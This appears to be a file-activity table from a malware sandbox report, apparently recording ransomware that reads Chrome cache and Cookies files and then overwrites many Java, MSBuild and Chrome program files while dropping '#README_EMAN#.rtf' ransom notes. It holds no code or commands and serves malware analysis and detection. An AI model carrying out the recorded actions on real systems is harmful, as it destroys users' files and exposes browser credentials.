| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001 | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000017 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000017 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 | size = 61440, size_out = 61440 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000015 | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 | size = 8192, size_out = 8192 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 | size = 1035, size_out = 1035 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001e | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001e | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\index | size = 61440, size_out = 61440 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\index | size = 8192, size_out = 8192 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 | size = 61440, size_out = 61440 |
|
4 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 | size = 16384, size_out = 16384 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001c | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000016 | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000016 | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cookies | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000014 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000014 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001f | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001f | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000018 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000018 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010 | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001b | size = 16384, size_out = 16384 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001b | size = 4096, size_out = 4096 |
|
1 | |
| Write | C:\Program Files\desktop.ini | size = 1590 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jabswitch.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jabswitch.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\kinit.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaw.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaw.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\server\Xusage.txt | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\server\Xusage.txt | size = 2839 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java-rmi.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java-rmi.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.cpl | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.cpl | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ktab.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ktab.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\policytool.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\policytool.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\accessibility.properties | size = 1565 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\servertool.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmid.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\orbd.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\LINEAR_RGB.pf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ja.properties | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\orbd.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmid.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\amd64\jvm.cfg | size = 2050 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\servertool.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\content-types.properties | size = 6964 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11@2x-lic.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11@2x-lic.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\CIEXYZ.pf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\CIEXYZ.pf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\unpack200.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\unpack200.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_sv.properties | size = 4825 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_fr.properties | size = 4825 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash@2x.gif | size = 7128 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\ffjcext.zip | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\ffjcext.zip | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\classlist | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\classlist | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | size = 5512 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | size = 4096 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightItalic.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightItalic.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_es.properties | size = 5016 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ssvagent.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ssvagent.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\currency.data | size = 5538 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | size = 61440 |
|
4 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\GRAY.pf | size = 2048 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | size = 61440 |
|
4 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\meta-index | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmiregistry.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_CN.properties | size = 5488 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | size = 61440 |
|
4 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmiregistry.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_it.properties | size = 4639 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunpkcs11.jar | size = 2794 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11-lic.gif | size = 9221 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages.properties | size = 4276 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_HK.properties | size = 5168 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jaccess.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jaccess.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\flavormap.properties | size = 5344 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunpkcs11.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunpkcs11.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\javafx.properties | size = 1472 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiBold.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiBold.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\invalid32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\zipfs.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\zipfs.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\cursors.properties | size = 2696 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jce.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiItalic.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\server\#README_EMAN#.rtf | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\server\#README_EMAN#.rtf | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiItalic.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\server\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\meta-index | size = 3871 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\psfontj2d.properties | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\amd64\#README_EMAN#.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\amd64\#README_EMAN#.rtf | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\US_export_policy.jar | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyDrop32x32.gif | size = 1581 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\US_export_policy.jar | size = 4442 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\meta-index | size = 3542 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveDrop32x32.gif | size = 1563 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\default.jfc | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jce.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\java.policy | size = 3882 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\default.jfc | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkDrop32x32.gif | size = 1584 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\release | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\#README_EMAN#.rtf | size = 1944 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\snmp.acl.template | size = 4792 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.access | size = 5414 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklisted.certs | size = 2669 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\LICENSE | size = 1456 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklist | size = 5470 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | size = 5512 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome_200_percent.pak | size = 8717 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | size = 6142 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\psfont.properties.ja | size = 4212 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\local_policy.jar | size = 4943 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome.dll.sig | size = 2823 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Extensions\external_extensions.json | size = 1515 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\Welcome.html | size = 2371 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\external_extensions.json | size = 2682 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome.exe.sig | size = 2823 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\resources.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\resources.jar | size = 61440 |
|
4 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\resources.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management-agent.jar | size = 1797 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\net.properties | size = 5880 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\java.security | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\java.security | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\COPYRIGHT | size = 4660 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\cacerts | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\cacerts | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\README.txt | size = 1462 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome_200_percent.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome_200_percent.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome_200_percent.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\da.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\da.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\sRGB.pf | size = 4560 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_pt_BR.properties | size = 4701 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\sound.properties | size = 2626 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | size = 6598 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\bn.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\bn.pak | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\bn.pak | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome_100_percent.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\chrome_100_percent.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fil.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fil.pak | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrmstp.exe | size = 2823 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\#README_EMAN#.rtf | size = 8717 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunmscapi.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunmscapi.jar | size = 4096 |
|
1 | |
